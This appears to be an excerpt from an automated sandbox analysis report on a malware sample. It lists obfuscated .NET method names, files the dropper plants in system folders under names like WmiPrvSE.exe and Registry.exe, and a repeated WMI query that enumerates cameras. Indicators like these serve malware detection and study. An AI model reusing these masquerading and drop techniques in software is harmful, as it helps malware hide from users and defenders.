                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, mYsVmWWIvKgsXj7PmMo.csHigh entropy of concatenated method names: 'UwIKWwfx9w', 'X3oKKbc954', 'lW7KAB2uw2', 'iJvKCji5WfgsF7eJg7JF', 'FSscXti5KGyDpC78sUjw', 'lpFoGhi5igtSvEsiGtqg', 'yTBLxLi5tGIdAR4gomj2', 'F5aKXJbV0n', 'KQOBPWi5RaRat5cVZc3L', 'jD3Ui1i5b25eo6kqqo04'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, AAikcCbvS5ULRoDXRY0.csHigh entropy of concatenated method names: 'CwKbDj0LfH', 'oErxoeiTkaSmxU6ZUJrr', 'cO390hiTUBrh6KBZI7qk', 'NYCoPfiTHoDp9cZ7ALS9', 'SAQjB3iTuyQw1gIq3nL4', 'dNPH4HiTO1PuxhOQZoa1', 'E94', 'P9X', 'vmethod_0', 'PpsiKPxsc1A'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.csHigh entropy of concatenated method names: 'HustjPi3Xk0b57I8VBqt', 'IOk7Jhi3G4xwK6kDQpNI', 'yHL2mvTOwO', 'rMLeyei3fDEAlHIteEMN', 'QN6itxi3CTmk1pfaXUfi', 'gTfAaXi3L6gpa7tUtviq', 'h6RtK8i3J6wtc058Gg05', 'YroV4ni39aIEntHTRdT6', 'Ag8vc5i3P5oGKrQgtZQy', 'NQuayci36rEjK12fE6ZC'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, dMryjfOS24URISgqbgt.csHigh entropy of concatenated method names: 'EOSsnKiynlPThd4vQMll', 'Nqj3eQiyIcJube7NW2RO', 'OQITXtiyVP9FC8ku3mDA', 'XPLtXyiyFAHIEwgffqmq', 'kT3FFhiy1kJvMGM5496V', 'irTJ57iyab9hOydfpDvF', 'Bvyt2ciy0hmxbZSdCGtK', 'vt7Aghiyq0iVRQC6LFDY'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, WkeBIwPgxR6eOopjOtd.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'Oa4P2BxKW8', 'nnuiRJsWWcj', 'gMrCmyipYS25rV6QpnIV', 'xp3hn7ip1UieVAl8Sm9r', 'yrVNm3ipav1rN2oBt26g', 'vsqrNlipIX7Vi6c7nSm5', 'uGbrnBipV1bsLICAsPlO'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, yvb7qaA0LXxCblWAv9M.csHigh entropy of concatenated method names: 'RsbAYAU7oT', 'YWi0BJiTcCu6FNMRAeMF', 'KVTMxZiTAOQAJRGHGncf', 'o09ZMXiTbOtqVVmSoc1P', 'AyBP0ZiTR5Bo76SM0vJL', 'PRC1wfiTQ0PpXdJnQYs7', 'U1J', 'P9X', 'lxniKfiGcq8', 'QqViKCPyfGr'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, EeIv5eT6iE60OVwqLax.csHigh entropy of concatenated method names: 'l2Dhxhcggy', 'vMy1SIiIg4WRhI5NfveU', 'xpNtOJiI4I9xuDqUHunX', 'DnkdHIiI2vFFhHuI02v1', 'kt5', 'LWUT8c23v1', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, R67UnnhS9MHSxs3vmX4.csHigh entropy of concatenated method names: 'Close', 'qL6', 'Ps3hHr2SP3', 'nQchk9uCr6', 'RK8huSf6C0', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, XEP8PP9krMXjsBsD37m.csHigh entropy of concatenated method names: 'uNO9FW3PEU', 'Bkg91HKcRO', 'IKC9abOR4K', 'aa7SPxiOvh6oOlsQtD1r', 'vpTSsMiOMt4Ait2lAQ7H', 'q5ig94iO8hoFOH3j6ZnF', 'yhWXTsiOofSxDS49PEG5', 'AHK9OOjXZx', 'uHn9pspaEj', 'I3w9w3a1Gu'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, ajT1mDREXs6YQ7Cn5Py.csHigh entropy of concatenated method names: 'hm1Ro3Ok2s', 'Chm6LFisqK5LLT8uJhWb', 'zXJ5UEisFq5kHAmlCpMq', 'RXvXL0is1XLhfdZZdOS7', 'RJ5jGHisaYY1F3DGagAS', 'pjVJ3AisYtsEIta5aeIC', 'JD8ja4iswjlXOicjh6dH', 'ie2OZyis03Uf7nF8goDY', 'nf7O1NisIPOKaDUsgOKA'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, VTx3Br3JvBFkSIq6OPV.csHigh entropy of concatenated method names: 'JY83N5VG6U', 'WS435C0M2v', 'Vh73DZtaAJ', 'ThN3TEBiqR', 'psu3hq5XXr', 'a7k3sZ2H0I', 'mav3SSmspx', 'N413Uj2sfU', 'NPl3H4MRYr', 'Gdk3kcnPAW'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, hZjM8BElPJOK4bAhRFg.csHigh entropy of concatenated method names: 'oBLoimjIqU', 'HiyTgvi0OasCoI3Ciw6Z', 'wsVjfXi0pJU4pD8mLhH3', 'bmIPcDi0wb70cGpU5cL7', 'csC6x8i009RIFbI5UhTe', 'sy3EBW0gMG', 'wBqEfIRHCk', 'LwvECxZneW', 'MRpELUt6ZY', 'IAbEJaj0pi'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, bHVqBO3ulf79bxqxpSB.csHigh entropy of concatenated method names: 'j32ibT7efY3', 'eNwibhYMB0U', 'D1tibswdgK8', 'DCKibSWn7iP', 'RXGibUanPgl', 'h8sibHwoFoZ', 'r2GibkKGI1V', 'RZbrAqVxc2', 'LZqibuWFOZu', 'WVqibOMVhh1'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, DAje7a5KAfsvphO7BYY.csHigh entropy of concatenated method names: 'Gvp5bHTKMd', 'R4L5c3j24Q', 'BwO5ROIbMM', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'UCA5Q1M7NT'
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exe
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exe
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe File created: C:\ComponentSavesinto\fontReviewsavesinto.exe
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Recovery\Registry.exe
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\ComponentSavesinto\WmiPrvSE.exe
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                    Malware Analysis System Evasion

                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
